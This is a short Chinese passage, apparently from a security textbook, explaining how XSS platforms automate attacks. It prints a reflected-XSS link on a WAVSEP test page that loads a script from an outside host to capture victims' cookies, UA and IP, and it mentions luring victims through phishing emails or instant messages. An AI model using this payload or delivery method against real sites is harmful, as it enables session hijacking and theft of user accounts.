目前市面上有大量的XSS平台,自动生成js攻击载荷,大大减小了攻击难度,主要步骤如下:
·注册XSS平台账户;
·获得XSS攻击代码,主要功能是获取用户cookie、ua、ip等信息:
http://webxss.top/xss/9C6YSs?1483513692
·结合XSS漏洞构造恶意链接:
http://testdomain.com/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case01-Tag2HtmlPageScope.jsp?userinput=<script%20src="http://webxss.top/xss/9C6YSs?148092496"></script>
恶意代码将注入到回显页面中,当用户访问该页面时,恶意代码将执行,受害者在testdomain.com下的cookie将被获取,黑客随即可获得受害者在这个域下的权限,见图4-5。比较常见的做法是通过钓鱼邮件、im消息等方式诱骗受害者点击。
图4-5 XSS平台上记录获取的信息